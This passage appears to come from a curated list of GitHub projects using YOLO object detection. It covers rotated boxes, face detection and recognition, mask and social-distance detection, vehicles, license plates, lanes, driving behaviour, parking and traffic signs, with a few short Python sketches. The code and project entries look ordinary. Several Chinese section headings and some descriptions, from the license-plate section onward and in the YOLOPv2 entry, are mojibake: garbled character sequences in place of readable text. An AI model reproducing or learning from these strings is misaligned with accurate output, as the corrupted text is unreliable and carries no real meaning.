- [AlphaRotate](https://github.com/yangxue0827/RotationDetection) <img src="https://img.shields.io/github/stars/yangxue0827/RotationDetection?style=social"/> : "AlphaRotate: A Rotation Detection Benchmark using TensorFlow". (**[arXiv 2021](https://arxiv.org/abs/2111.06677)**)
- [hukaixuan19970627/yolov5_obb](https://github.com/hukaixuan19970627/yolov5_obb) <img src="https://img.shields.io/github/stars/hukaixuan19970627/yolov5_obb?style=social"/> : yolov5 + CSL label. Oriented object detection (rotation detection, rotated bounding boxes) based on yolov5.
- [BossZard/rotation-yolov5](https://github.com/BossZard/rotation-yolov5) <img src="https://img.shields.io/github/stars/BossZard/rotation-yolov5?style=social"/> : rotation detection based on yolov5.
- [acai66/yolov5_rotation](https://github.com/acai66/yolov5_rotation) <img src="https://img.shields.io/github/stars/acai66/yolov5_rotation?style=social"/> : rotated bbox detection. inspired by [hukaixuan19970627/yolov5_obb](https://github.com/hukaixuan19970627/yolov5_obb), thanks hukaixuan19970627.
- [ming71/rotate-yolov3](https://github.com/ming71/rotate-yolov3) <img src="https://img.shields.io/github/stars/ming71/rotate-yolov3?style=social"/> : Arbitrary oriented object detection implemented with yolov3 (attached with some tricks).
- [ming71/yolov3-polygon](https://github.com/ming71/yolov3-polygon) <img src="https://img.shields.io/github/stars/ming71/yolov3-polygon?style=social"/> : Arbitrary-oriented object detection based on yolov3.
- [kunnnnethan/R-YOLOv4](https://github.com/kunnnnethan/R-YOLOv4) <img src="https://img.shields.io/github/stars/kunnnnethan/R-YOLOv4?style=social"/> : This is a PyTorch-based R-YOLOv4 implementation which combines the YOLOv4 model and the loss function from R3Det for arbitrary oriented object detection.
- [XinzeLee/PolygonObjectDetection](https://github.com/XinzeLee/PolygonObjectDetection) <img src="https://img.shields.io/github/stars/XinzeLee/PolygonObjectDetection?style=social"/> : This repository is based on Ultralytics/yolov5, with adjustments to enable polygon prediction boxes.
- [hukaixuan19970627/DOTA_devkit_YOLO](https://github.com/hukaixuan19970627/DOTA_devkit_YOLO) <img src="https://img.shields.io/github/stars/hukaixuan19970627/DOTA_devkit_YOLO?style=social"/> : Convert DOTA OBB format (poly format) to YOLO format.
- [hpc203/rotate-yolov5-opencv-onnxrun](https://github.com/hpc203/rotate-yolov5-opencv-onnxrun) <img src="https://img.shields.io/github/stars/hpc203/rotate-yolov5-opencv-onnxrun?style=social"/> : Deploy yolov5 rotated object detection with OpenCV and ONNXRuntime respectively, with both C++ and Python versions.
- [hpc203/rotateyolov5-opencv-onnxrun](https://github.com/hpc203/rotateyolov5-opencv-onnxrun) <img src="https://img.shields.io/github/stars/hpc203/rotateyolov5-opencv-onnxrun?style=social"/> : Deploy yolov5 rotated object detection with OpenCV and ONNXRuntime respectively, with both C++ and Python versions.
- [DDGRCF/YOLOX_OBB](https://github.com/DDGRCF/YOLOX_OBB) <img src="https://img.shields.io/github/stars/DDGRCF/YOLOX_OBB?style=social"/> : YOLOX OBB -- YOLOX rotated boxes | instance segmentation. Zhihu 「刀刀狗」: 《[YOLOX OBB -- YOLOX 旋转框检测 超详细!!!](https://zhuanlan.zhihu.com/p/430850089)》.
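A recurring chore in the oriented-detection repos above is converting a (center, size, angle) box into polygon corners for drawing or IoU computation. A minimal numpy sketch; note that the angle convention (CW vs CCW, degrees vs radians) differs between repos, and here it is counter-clockwise radians:

```python
import numpy as np

def obb_to_corners(cx, cy, w, h, angle):
    """Rotated box (center, size, CCW angle in radians) -> 4x2 corner array."""
    c, s = np.cos(angle), np.sin(angle)
    rot = np.array([[c, -s], [s, c]])
    half = np.array([[-w, -h], [w, -h], [w, h], [-w, h]]) / 2.0
    return half @ rot.T + np.array([cx, cy])

print(obb_to_corners(100, 50, 40, 20, np.pi / 6))
```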
- ### Face Detection and Recognition #### 人脸检测与识别
- #### Face Detection ##### 人脸检测
- [YOLO5Face](https://github.com/deepcam-cn/yolov5-face) <img src="https://img.shields.io/github/stars/deepcam-cn/yolov5-face?style=social"/> : "YOLO5Face: Why Reinventing a Face Detector". (**[arXiv 2021](https://arxiv.org/abs/2105.12931)**)
- [derronqi/yolov7-face](https://github.com/derronqi/yolov7-face) <img src="https://img.shields.io/github/stars/derronqi/yolov7-face?style=social"/> : yolov7 face detection with landmark.
- [derronqi/yolov8-face](https://github.com/derronqi/yolov8-face) <img src="https://img.shields.io/github/stars/derronqi/yolov8-face?style=social"/> : yolov8 face detection with landmark.
- [we0091234/yolov7-face-tensorrt](https://github.com/we0091234/yolov7-face-tensorrt) <img src="https://img.shields.io/github/stars/we0091234/yolov7-face-tensorrt?style=social"/> : yolov7-face TensorRT.
- [YOLO-FaceV2](https://github.com/Krasjet-Yu/YOLO-FaceV2) <img src="https://img.shields.io/github/stars/Krasjet-Yu/YOLO-FaceV2?style=social"/> : "YOLO-FaceV2: A Scale and Occlusion Aware Face Detector". (**[arXiv 2022](https://arxiv.org/abs/2208.02019)**). WeChat official account 「江大白」: 《[超越Yolo5-Face,Yolo-Facev2开源,各类Trick优化,值得学习!](https://mp.weixin.qq.com/s?__biz=Mzg5NzgyNTU2Mg==&mid=2247498561&idx=1&sn=b7ff0592644ab6bc5b716e07294e1c0a&source=41#wechat_redirect)》.
- [OAID/TengineKit](https://github.com/OAID/TengineKit) <img src="https://img.shields.io/github/stars/OAID/TengineKit?style=social"/> : TengineKit - Free, Fast, Easy, Real-Time Face Detection & Face Landmarks & Face Attributes & Hand Detection & Hand Landmarks & Body Detection & Body Landmarks & Iris Landmarks & Yolov5 SDK On Mobile.
- [xialuxi/yolov5_face_landmark](https://github.com/xialuxi/yolov5_face_landmark) <img src="https://img.shields.io/github/stars/xialuxi/yolov5_face_landmark?style=social"/> : Face detection based on yolov5, with landmark detection.
- [sthanhng/yoloface](https://github.com/sthanhng/yoloface) <img src="https://img.shields.io/github/stars/sthanhng/yoloface?style=social"/> : Deep learning-based Face detection using the YOLOv3 algorithm.
- [DayBreak-u/yolo-face-with-landmark](https://github.com/DayBreak-u/yolo-face-with-landmark) <img src="https://img.shields.io/github/stars/DayBreak-u/yolo-face-with-landmark?style=social"/> : yoloface bundle: lightweight yolov3-based face detection (with landmarks) implemented in pytorch.
- [abars/YoloKerasFaceDetection](https://github.com/abars/YoloKerasFaceDetection) <img src="https://img.shields.io/github/stars/abars/YoloKerasFaceDetection?style=social"/> : Face Detection and Gender and Age Classification using Keras.
- [dannyblueliu/YOLO-Face-detection](https://github.com/dannyblueliu/YOLO-Face-detection) <img src="https://img.shields.io/github/stars/dannyblueliu/YOLO-Face-detection?style=social"/> : Face detection based on YOLO darknet.
- [wmylxmj/YOLO-V3-IOU](https://github.com/wmylxmj/YOLO-V3-IOU) <img src="https://img.shields.io/github/stars/wmylxmj/YOLO-V3-IOU?style=social"/> : YOLOv3 anime face detection (based on keras and tensorflow), 2019-1-19.
- [pranoyr/head-detection-using-yolo](https://github.com/pranoyr/head-detection-using-yolo) <img src="https://img.shields.io/github/stars/pranoyr/head-detection-using-yolo?style=social"/> : Detection of head using YOLO.
- [grapeot/AnimeHeadDetector](https://github.com/grapeot/AnimeHeadDetector) <img src="https://img.shields.io/github/stars/grapeot/AnimeHeadDetector?style=social"/> : An object detector for character heads in animes, based on Yolo V3.
- [Chenyang-ZHU/YOLOv3-Based-Face-Detection-Tracking](https://github.com/Chenyang-ZHU/YOLOv3-Based-Face-Detection-Tracking) <img src="https://img.shields.io/github/stars/Chenyang-ZHU/YOLOv3-Based-Face-Detection-Tracking?style=social"/> : This is a robot project for live television. The system tracks the host's face and keeps it centered on the screen.
- [zdfb/Yolov5_face](https://github.com/zdfb/Yolov5_face) <img src="https://img.shields.io/github/stars/zdfb/Yolov5_face?style=social"/> : Yolov5 face detection based on pytorch.
- [jinfagang/yolov7-face](https://github.com/jinfagang/yolov7-face) <img src="https://img.shields.io/github/stars/jinfagang/yolov7-face?style=social"/> : Next Gen Face detection based on YOLOv7.
- [Yusepp/YOLOv8-Face](https://github.com/Yusepp/YOLOv8-Face) <img src="https://img.shields.io/github/stars/Yusepp/YOLOv8-Face?style=social"/> : YOLOv8 for Face Detection.
- #### Face Recognition ##### 人脸识别
- [ChanChiChoi/awesome-Face_Recognition](https://github.com/ChanChiChoi/awesome-Face_Recognition) <img src="https://img.shields.io/github/stars/ChanChiChoi/awesome-Face_Recognition?style=social"/> : papers about Face Detection; Face Alignment; Face Recognition && Face Identification && Face Verification && Face Representation; Face Reconstruction; Face Tracking; Face Super-Resolution && Face Deblurring; Face Generation && Face Synthesis; Face Transfer; Face Anti-Spoofing; Face Retrieval.
- [hpc203/10kinds-light-face-detector-align-recognition](https://github.com/hpc203/10kinds-light-face-detector-align-recognition) <img src="https://img.shields.io/github/stars/hpc203/10kinds-light-face-detector-align-recognition?style=social"/> : A comparison of 10 lightweight face detection algorithms, also covering face landmark detection and alignment, face feature vector extraction, and distance/similarity computation.
- [ooooxianyu/yoloV5-arcface_forlearn](https://github.com/ooooxianyu/yoloV5-arcface_forlearn) <img src="https://img.shields.io/github/stars/ooooxianyu/yoloV5-arcface_forlearn?style=social"/> : A face recognition project assembled from existing source code, for learning and reference; it uses yolov5 for face detection and arcface for face recognition.
- [zhouyuchong/face-recognition-deepstream](https://github.com/zhouyuchong/face-recognition-deepstream) <img src="https://img.shields.io/github/stars/zhouyuchong/face-recognition-deepstream?style=social"/> : Deepstream app using YOLO, retinaface and arcface for face recognition.
- [duckzhao/face_detection_and_recognition_yolov5](https://github.com/duckzhao/face_detection_and_recognition_yolov5) <img src="https://img.shields.io/github/stars/duckzhao/face_detection_and_recognition_yolov5?style=social"/> : Builds a face detection model with yolov5 and uses a pre-trained Arcface for face feature extraction and recognition.
- [PhucNDA/FaceID--YOLOV5.ArcFace](https://github.com/PhucNDA/FaceID--YOLOV5.ArcFace) <img src="https://img.shields.io/github/stars/PhucNDA/FaceID--YOLOV5.ArcFace?style=social"/> : ONNX implementation of YOLOv5 and Siamese Network (ResNet100) with ArcFace loss for Face Detection and Recognition.
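The detect-then-recognize pipelines above (YOLO for face boxes, ArcFace for identity) typically reduce recognition to comparing embedding vectors against an enrolled gallery. A minimal sketch of that matching step; the 512-d embeddings here are random placeholders standing in for ArcFace outputs, and the threshold is illustrative:

```python
import numpy as np

def cosine_similarity(a, b):
    return float(a @ b / (np.linalg.norm(a) * np.linalg.norm(b) + 1e-9))

gallery = {name: np.random.randn(512) for name in ('alice', 'bob')}  # enrolled faces
probe = np.random.randn(512)              # embedding of a newly detected face crop

name, score = max(((n, cosine_similarity(probe, e)) for n, e in gallery.items()),
                  key=lambda t: t[1])
THRESHOLD = 0.35                          # tuned on a validation set in practice
print(name if score > THRESHOLD else 'unknown', score)
```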
- ### Face Mask Detection #### 口罩检测
- [Bil369/MaskDetect-YOLOv4-PyTorch](https://github.com/Bil369/MaskDetect-YOLOv4-PyTorch) <img src="https://img.shields.io/github/stars/Bil369/MaskDetect-YOLOv4-PyTorch?style=social"/> : Face mask detection based on PyTorch & YOLOv4 ⭐ with a self-built face mask dataset shared.
- [adityap27/face-mask-detector](https://github.com/adityap27/face-mask-detector) <img src="https://img.shields.io/github/stars/adityap27/face-mask-detector?style=social"/> : 𝐑𝐞𝐚𝐥-𝐓𝐢𝐦𝐞 𝐅𝐚𝐜𝐞 𝐦𝐚𝐬𝐤 𝐝𝐞𝐭𝐞𝐜𝐭𝐢𝐨𝐧 𝐮𝐬𝐢𝐧𝐠 𝐝𝐞𝐞𝐩𝐥𝐞𝐚𝐫𝐧𝐢𝐧𝐠 𝐰𝐢𝐭𝐡 𝐀𝐥𝐞𝐫𝐭 𝐬𝐲𝐬𝐭𝐞𝐦 💻🔔
- [VictorLin000/YOLOv3_mask_detect](https://github.com/VictorLin000/YOLOv3_mask_detect) <img src="https://img.shields.io/github/stars/VictorLin000/YOLOv3_mask_detect?style=social"/> : Face mask detection using YOLOv3 on GoogleColab.
- [amh28/IBM-Data-Science-Capstone-Alejandra-Marquez](https://github.com/amh28/IBM-Data-Science-Capstone-Alejandra-Marquez) <img src="https://img.shields.io/github/stars/amh28/IBM-Data-Science-Capstone-Alejandra-Marquez?style=social"/> : Homemade face mask detector fine-tuning a Yolo-v3 network.
- [LorenRd/JetsonYolov4](https://github.com/LorenRd/JetsonYolov4) <img src="https://img.shields.io/github/stars/LorenRd/JetsonYolov4?style=social"/> : Face Mask Yolov4 detector - Nvidia Jetson Nano.
- [Backl1ght/yolov4_face_mask_detection](https://github.com/Backl1ght/yolov4_face_mask_detection) <img src="https://img.shields.io/github/stars/Backl1ght/yolov4_face_mask_detection?style=social"/> : Face mask detection based on yolov4, reaching 0.954 mAP on the validation set.
- [pritul2/yolov5_FaceMask](https://github.com/pritul2/yolov5_FaceMask) <img src="https://img.shields.io/github/stars/pritul2/yolov5_FaceMask?style=social"/> : Detecting person with or without face mask. Trained using YOLOv5.
- [NisargPethani/FACE-MASK-DETECTION-USING-YOLO-V3](https://github.com/NisargPethani/FACE-MASK-DETECTION-USING-YOLO-V3) <img src="https://img.shields.io/github/stars/NisargPethani/FACE-MASK-DETECTION-USING-YOLO-V3?style=social"/> : FACE-MASK DETECTION.
- [waittim/mask-detector](https://github.com/waittim/mask-detector) <img src="https://img.shields.io/github/stars/waittim/mask-detector?style=social"/> : Real-time video streaming mask detection based on Python. Designed to defeat COVID-19.
- [BogdanMarghescu/Face-Mask-Detection-Using-YOLOv4](https://github.com/BogdanMarghescu/Face-Mask-Detection-Using-YOLOv4) <img src="https://img.shields.io/github/stars/BogdanMarghescu/Face-Mask-Detection-Using-YOLOv4?style=social"/> : Face Mask Detector using YOLOv4.
- [xinghanliuying/yolov5_bus](https://github.com/xinghanliuying/yolov5_bus) <img src="https://img.shields.io/github/stars/xinghanliuying/yolov5_bus?style=social"/> : A step-by-step tutorial on training your own object detection model with YOLOV5.
- [song-laogou/yolov5-mask-42](https://gitee.com/song-laogou/yolov5-mask-42) : A YOLOV5-based face mask detection system, with teaching videos.
- ### Social Distance Detection #### 社交距离检测
- [Ank-Cha/Social-Distancing-Analyser-COVID-19](https://github.com/Ank-Cha/Social-Distancing-Analyser-COVID-19) <img src="https://img.shields.io/github/stars/Ank-Cha/Social-Distancing-Analyser-COVID-19?style=social"/> : Social Distancing Analyser to prevent COVID19.
- [abd-shoumik/Social-distance-detection](https://github.com/abd-shoumik/Social-distance-detection) <img src="https://img.shields.io/github/stars/abd-shoumik/Social-distance-detection?style=social"/> : Social distance detection, a deep learning computer vision project with yolo object detection.
- [ChargedMonk/Social-Distancing-using-YOLOv5](https://github.com/ChargedMonk/Social-Distancing-using-YOLOv5) <img src="https://img.shields.io/github/stars/ChargedMonk/Social-Distancing-using-YOLOv5?style=social"/> : Classifying people as high risk and low risk based on their distance to other people.
- [JohnBetaCode/Social-Distancing-Analyser](https://github.com/JohnBetaCode/Social-Distancing-Analyser) <img src="https://img.shields.io/github/stars/JohnBetaCode/Social-Distancing-Analyser?style=social"/> : Social Distancing Analyzer.
- [Ashamaria/Safe-distance-tracker-using-YOLOv3-v3](https://github.com/Ashamaria/Safe-distance-tracker-using-YOLOv3-v3) <img src="https://img.shields.io/github/stars/Ashamaria/Safe-distance-tracker-using-YOLOv3-v3?style=social"/> : Safe Distance Tracker.
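The social-distancing entries above boil down to thresholding pairwise distances between detected people. A toy sketch over box centroids; pixel distances stand in for calibrated ground-plane distances, which real systems obtain via a homography or depth estimate:

```python
import numpy as np

boxes = np.array([[100, 200, 160, 380],           # person boxes as x1, y1, x2, y2
                  [180, 210, 240, 400],
                  [600, 190, 660, 390]])
centroids = np.stack([(boxes[:, 0] + boxes[:, 2]) / 2,
                      (boxes[:, 1] + boxes[:, 3]) / 2], axis=1)

MIN_PIXELS = 120                                   # placeholder for ~2 m after calibration
diff = centroids[:, None, :] - centroids[None, :, :]
dist = np.linalg.norm(diff, axis=-1)               # full pairwise distance matrix
too_close = np.argwhere((dist < MIN_PIXELS) & (dist > 0))
print({tuple(sorted(p)) for p in too_close})       # high-risk pairs, e.g. {(0, 1)}
```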
- [Gaussian_YOLOv3](https://github.com/jwchoi384/Gaussian_YOLOv3) <img src="https://img.shields.io/github/stars/jwchoi384/Gaussian_YOLOv3?style=social"/> : "Gaussian YOLOv3: An Accurate and Fast Object Detector Using Localization Uncertainty for Autonomous Driving". (**[ICCV 2019](https://openaccess.thecvf.com/content_ICCV_2019/html/Choi_Gaussian_YOLOv3_An_Accurate_and_Fast_Object_Detector_Using_Localization_ICCV_2019_paper.html)**)
- [streamlit/demo-self-driving](https://github.com/streamlit/demo-self-driving) <img src="https://img.shields.io/github/stars/streamlit/demo-self-driving?style=social"/> : Streamlit app demonstrating an image browser for the Udacity self-driving-car dataset with real-time object detection using YOLO.
- [JunshengFu/vehicle-detection](https://github.com/JunshengFu/vehicle-detection) <img src="https://img.shields.io/github/stars/JunshengFu/vehicle-detection?style=social"/> : A vehicle detection pipeline with two approaches: (1) deep neural networks (YOLO framework) and (2) support vector machines (OpenCV + HOG).
- [xslittlegrass/CarND-Vehicle-Detection](https://github.com/xslittlegrass/CarND-Vehicle-Detection) <img src="https://img.shields.io/github/stars/xslittlegrass/CarND-Vehicle-Detection?style=social"/> : Vehicle detection using YOLO in Keras, running at 21 FPS.
- [Kevinnan-teen/Intelligent-Traffic-Based-On-CV](https://github.com/Kevinnan-teen/Intelligent-Traffic-Based-On-CV) <img src="https://img.shields.io/github/stars/Kevinnan-teen/Intelligent-Traffic-Based-On-CV?style=social"/> : An intelligent traffic-intersection monitoring system based on computer vision.
- [subodh-malgonde/vehicle-detection](https://github.com/subodh-malgonde/vehicle-detection) <img src="https://img.shields.io/github/stars/subodh-malgonde/vehicle-detection?style=social"/> : Detect vehicles in a video.
- [CaptainEven/Vehicle-Car-detection-and-multilabel-classification](https://github.com/CaptainEven/Vehicle-Car-detection-and-multilabel-classification) <img src="https://img.shields.io/github/stars/CaptainEven/Vehicle-Car-detection-and-multilabel-classification?style=social"/> : Uses YOLOv3-tiny and B-CNN for street vehicle detection and multi-label classification of vehicle attributes.
- [kaylode/vehicle-counting](https://github.com/kaylode/vehicle-counting) <img src="https://img.shields.io/github/stars/kaylode/vehicle-counting?style=social"/> : Vehicle counting using PyTorch.
- [MaryamBoneh/Vehicle-Detection](https://github.com/MaryamBoneh/Vehicle-Detection) <img src="https://img.shields.io/github/stars/MaryamBoneh/Vehicle-Detection?style=social"/> : Vehicle detection using deep learning and the YOLO algorithm.
- [JeffWang0325/Image-Identification-for-Self-Driving-Cars](https://github.com/JeffWang0325/Image-Identification-for-Self-Driving-Cars) <img src="https://img.shields.io/github/stars/JeffWang0325/Image-Identification-for-Self-Driving-Cars?style=social"/> : This project achieves some functions of image identification for self-driving cars.
- [AnarbekovAlt/Traffic-analysis](https://github.com/AnarbekovAlt/Traffic-analysis) <img src="https://img.shields.io/github/stars/AnarbekovAlt/Traffic-analysis?style=social"/> : A traffic analysis system built on the YOLO network.
- [ruhyadi/yolov5-nodeflux](https://github.com/ruhyadi/yolov5-nodeflux) <img src="https://img.shields.io/github/stars/ruhyadi/yolov5-nodeflux?style=social"/> : YOLOv5 Nodeflux Vehicle Detection.
- [Daheer/Driving-Environment-Detector](https://github.com/Daheer/Driving-Environment-Detector) <img src="https://img.shields.io/github/stars/Daheer/Driving-Environment-Detector?style=social"/> : Detecting road objects using the YOLO CNN architecture.
- [georgia-tech-db/eva](https://github.com/georgia-tech-db/eva) <img src="https://img.shields.io/github/stars/georgia-tech-db/eva?style=social"/> : Exploratory Video Analytics System.
- [heathhenley/RhodyCarCounter](https://github.com/heathhenley/RhodyCarCounter) <img src="https://img.shields.io/github/stars/heathhenley/RhodyCarCounter?style=social"/> : An app that uses YOLO to count the cars passing by traffic cams, mostly in the Providence, RI area.
- [zehengl/yyc-traffic-cam](https://github.com/zehengl/yyc-traffic-cam) <img src="https://img.shields.io/github/stars/zehengl/yyc-traffic-cam?style=social"/> : A demo to detect vehicles in traffic cams. [zehengl.github.io/yyc-traffic-cam/](https://zehengl.github.io/yyc-traffic-cam/)
- [ruhyadi/vehicle-detection-yolov8](https://github.com/ruhyadi/vehicle-detection-yolov8) <img src="https://img.shields.io/github/stars/ruhyadi/vehicle-detection-yolov8?style=social"/> : Vehicle Detection with YOLOv8.
- #### License Plate Detection and Recognition
##### ่ฝฆ็‰Œๆฃ€ๆต‹ไธŽ่ฏ†ๅˆซ
- [zeusees/License-Plate-Detector](https://github.com/zeusees/License-Plate-Detector) <img src="https://img.shields.io/github/stars/zeusees/License-Plate-Detector?style=social"/> : License plate detection with YOLOv5.
- [TheophileBuy/LicensePlateRecognition](https://github.com/TheophileBuy/LicensePlateRecognition) <img src="https://img.shields.io/github/stars/TheophileBuy/LicensePlateRecognition?style=social"/> : License Plate Recognition.
- [alitourani/yolo-license-plate-detection](https://github.com/alitourani/yolo-license-plate-detection) <img src="https://img.shields.io/github/stars/alitourani/yolo-license-plate-detection?style=social"/> : A license plate detection application based on YOLO.
- [HuKai97/YOLOv5-LPRNet-Licence-Recognition](https://github.com/HuKai97/YOLOv5-LPRNet-Licence-Recognition) <img src="https://img.shields.io/github/stars/HuKai97/YOLOv5-LPRNet-Licence-Recognition?style=social"/> : License plate detection and recognition with YOLOv5 and LPRNet (CCPD dataset).
- [xialuxi/yolov5-car-plate](https://github.com/xialuxi/yolov5-car-plate) <img src="https://img.shields.io/github/stars/xialuxi/yolov5-car-plate?style=social"/> : YOLOv5-based license plate detection, including plate corner-point detection.
- [kyrielw24/License_Plate_Recognition](https://github.com/kyrielw24/License_Plate_Recognition) <img src="https://img.shields.io/github/stars/kyrielw24/License_Plate_Recognition?style=social"/> : A license plate recognition and visualization project based on YOLO & CNN.
- [we0091234/yolov7_plate](https://github.com/we0091234/yolov7_plate) <img src="https://img.shields.io/github/stars/we0091234/yolov7_plate?style=social"/> : YOLOv7 license plate detection and recognition for Chinese plates; supports double-layer plates and 13 Chinese plate types.
- [MuhammadMoinFaisal/Automatic_Number_Plate_Detection_Recognition_YOLOv8](https://github.com/MuhammadMoinFaisal/Automatic_Number_Plate_Detection_Recognition_YOLOv8) <img src="https://img.shields.io/github/stars/MuhammadMoinFaisal/Automatic_Number_Plate_Detection_Recognition_YOLOv8?style=social"/> : Automatic Number Plate Detection YOLOv8.
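Most of the plate-reading projects above share the same two-stage pattern: a YOLO detector localizes the plate, then a separate recognizer (LPRNet, CRNN, or a generic OCR) reads the crop. A minimal sketch of that hand-off, assuming the `ultralytics` package; `plate.pt` and `read_plate()` are hypothetical stand-ins for trained plate weights and an LPRNet/OCR recognizer:

```python
# Two-stage plate reading: YOLO finds plates, a recognizer reads the crops.
import cv2
from ultralytics import YOLO

def read_plate(crop):
    # Placeholder: plug in LPRNet / CRNN / any OCR model here.
    return "<plate-text>"

model = YOLO("plate.pt")             # hypothetical plate-detection weights
frame = cv2.imread("car.jpg")
for box in model(frame)[0].boxes:    # one Results object per input image
    x1, y1, x2, y2 = map(int, box.xyxy[0].tolist())
    plate_crop = frame[y1:y2, x1:x2]         # cropped plate region
    print(read_plate(plate_crop), float(box.conf[0]))
```

Keeping detection and recognition separate lets either half be retrained or swapped (e.g. for a different country's plates) without touching the other.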
- #### Lane Detection
##### ่ฝฆ้“็บฟๆฃ€ๆต‹
- [YOLOP](https://github.com/hustvl/YOLOP) <img src="https://img.shields.io/github/stars/hustvl/YOLOP?style=social"/> : "YOLOP: You Only Look Once for Panoptic Driving Perception". (**[arXiv 2021](https://arxiv.org/abs/2108.11250)**).
- [YOLOPv2](https://github.com/CAIC-AD/YOLOPv2) <img src="https://img.shields.io/github/stars/CAIC-AD/YOLOPv2?style=social"/> : "YOLOPv2: Better, Faster, Stronger for Panoptic Driving Perception". (**[arXiv 2022](https://arxiv.org/abs/2208.11434)**). "ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ้›†ๆ™บไนฆ็ซฅใ€ใ€Š[YOLOP v2ๆฅๅ•ฆ | YOLOv7็ป“ๅˆYOLOP็š„ๅคšไปปๅŠก็‰ˆๆœฌ๏ผŒ่ถ…่ถŠYOLOPไปฅๅŠHybridNets](https://mp.weixin.qq.com/s/XTD32JCu_YbZjV2Br3KXCA)ใ€‹"
- [FeiGeChuanShu/YOLOPv2-ncnn](https://github.com/FeiGeChuanShu/YOLOPv2-ncnn) <img src="https://img.shields.io/github/stars/FeiGeChuanShu/YOLOPv2-ncnn?style=social"/> : YOLOPv2-ncnn.
- [visualbuffer/copilot](https://github.com/visualbuffer/copilot) <img src="https://img.shields.io/github/stars/visualbuffer/copilot?style=social"/> : Lane and obstacle detection for active assistance during driving.
- [hpc203/YOLOP-opencv-dnn](https://github.com/hpc203/YOLOP-opencv-dnn) <img src="https://img.shields.io/github/stars/hpc203/YOLOP-opencv-dnn?style=social"/> : Deploys the panoptic driving perception network YOLOP with the OpenCV dnn module, handling three visual perception tasks at once: traffic object detection, drivable-area segmentation, and lane detection.
- [EdVince/YOLOP-NCNN](https://github.com/EdVince/YOLOP-NCNN) <img src="https://img.shields.io/github/stars/EdVince/YOLOP-NCNN?style=social"/> : YOLOP running on Android via ncnn.
- #### Driving Behavior Detection
##### ้ฉพ้ฉถ่กŒไธบๆฃ€ๆต‹
- [JingyibySUTsoftware/Yolov5-deepsort-driverDistracted-driving-behavior-detection](https://github.com/JingyibySUTsoftware/Yolov5-deepsort-driverDistracted-driving-behavior-detection) <img src="https://img.shields.io/github/stars/JingyibySUTsoftware/Yolov5-deepsort-driverDistracted-driving-behavior-detection?style=social"/> : A deep-learning early-warning system for distracted driving (fatigue plus dangerous behavior), using YOLOv5 + DeepSort to monitor and warn about dangerous driver behavior.
- [Arrowes/CEAM-YOLOv7](https://github.com/Arrowes/CEAM-YOLOv7) <img src="https://img.shields.io/github/stars/Arrowes/CEAM-YOLOv7?style=social"/> : "CEAM-YOLOv7: Improved YOLOv7 Based on Channel Expansion and Attention Mechanism for Driver Distraction Behavior Detection". (**[IEEE Access, 2022](https://ieeexplore.ieee.org/abstract/document/9980374/)**).
- #### Parking Slot Detection
##### ๅœ่ฝฆไฝๆฃ€ๆต‹
- [visualbuffer/parkingslot](https://github.com/visualbuffer/parkingslot) <img src="https://img.shields.io/github/stars/visualbuffer/parkingslot?style=social"/> : Automated parking occupancy detection.
- [anil2k/smart-car-parking-yolov5](https://github.com/anil2k/smart-car-parking-yolov5) <img src="https://img.shields.io/github/stars/anil2k/smart-car-parking-yolov5?style=social"/> : Detect free parking slots available for cars.
- #### Traffic Light Detection
##### ไบค้€š็ฏๆฃ€ๆต‹
- [berktepebag/Traffic-light-detection-with-YOLOv3-BOSCH-traffic-light-dataset](https://github.com/berktepebag/Traffic-light-detection-with-YOLOv3-BOSCH-traffic-light-dataset) <img src="https://img.shields.io/github/stars/berktepebag/Traffic-light-detection-with-YOLOv3-BOSCH-traffic-light-dataset?style=social"/> : Detecting traffic lights in real time with YOLOv3.
- [mihir-m-gandhi/Adaptive-Traffic-Signal-Timer](https://github.com/mihir-m-gandhi/Adaptive-Traffic-Signal-Timer) <img src="https://img.shields.io/github/stars/mihir-m-gandhi/Adaptive-Traffic-Signal-Timer?style=social"/> : This adaptive traffic signal timer uses live images from cameras at traffic junctions for real-time traffic density calculation using YOLO object detection and sets the signal timers accordingly.
- [wade0125/Traffic_Light_Detection_Yolo](https://github.com/wade0125/Traffic_Light_Detection_Yolo) <img src="https://img.shields.io/github/stars/wade0125/Traffic_Light_Detection_Yolo?style=social"/> : Traffic Light Detection Yolo.
- #### Traffic Sign Detection
##### ไบค้€šๆ ‡ๅฟ—ๆฃ€ๆต‹
- [Ai-trainee/Traffic-Sign-Recognition-PyQt5-YOLOv5-GUI](https://github.com/Ai-trainee/Traffic-Sign-Recognition-PyQt5-YOLOv5-GUI) <img src="https://img.shields.io/github/stars/Ai-trainee/Traffic-Sign-Recognition-PyQt5-YOLOv5-GUI?style=social"/> : Road Sign Recognition Project Based on YOLOv5 ๐Ÿ˜Š, developed with a PyQt5 interface ๐ŸŽจ, a trained YOLOv5 model, and a MySQL database ๐Ÿ’ฝ, using the PyTorch deep learning framework with TensorRT acceleration โšก and CSS styling ๐ŸŒˆ. The system consists of five main modules: a login module ๐Ÿ”‘ for user sign-in; a parameter initialization module ๐Ÿ“‹ providing the initial settings of the YOLOv5 model; a sign recognition module ๐Ÿ”, the core of the system, which recognizes road signs and writes the results to the database; a database module ๐Ÿ’พ with basic database operations and data analysis submodules; and an image processing module ๐Ÿ–ผ๏ธ for single-image processing and data augmentation. The system supports multiple data inputs and model switching, and provides image augmentation methods including mosaic and mixup ๐Ÿ“ˆ.
- [halftop/TT100K_YOLO_Label](https://github.com/halftop/TT100K_YOLO_Label) <img src="https://img.shields.io/github/stars/halftop/TT100K_YOLO_Label?style=social"/> : XML and TXT labels for the Tsinghua-Tencent 100K dataset.
- [amazingcodeLYL/Traffic_signs_detection_darket](https://github.com/amazingcodeLYL/Traffic_signs_detection_darket) <img src="https://img.shields.io/github/stars/amazingcodeLYL/Traffic_signs_detection_darket?style=social"/> : Darknet traffic sign detection & the TT100K dataset.
- [TalkUHulk/yolov3-TT100k](https://github.com/TalkUHulk/yolov3-TT100k) <img src="https://img.shields.io/github/stars/TalkUHulk/yolov3-TT100k?style=social"/> : A TT100K (traffic sign) model trained with YOLOv3.
- [TalkUHulk/yolov4-TT100k](https://github.com/TalkUHulk/yolov4-TT100k) <img src="https://img.shields.io/github/stars/TalkUHulk/yolov4-TT100k?style=social"/> : A TT100K (traffic sign) model trained with YOLOv4.
- [sarah-antillia/YOLO_Realistic_USA_RoadSigns_160classes](https://github.com/sarah-antillia/YOLO_Realistic_USA_RoadSigns_160classes) <img src="https://img.shields.io/github/stars/sarah-antillia/YOLO_Realistic_USA_RoadSigns_160classes?style=social"/> : USA RoadSigns dataset with 160 classes annotated in YOLO format.
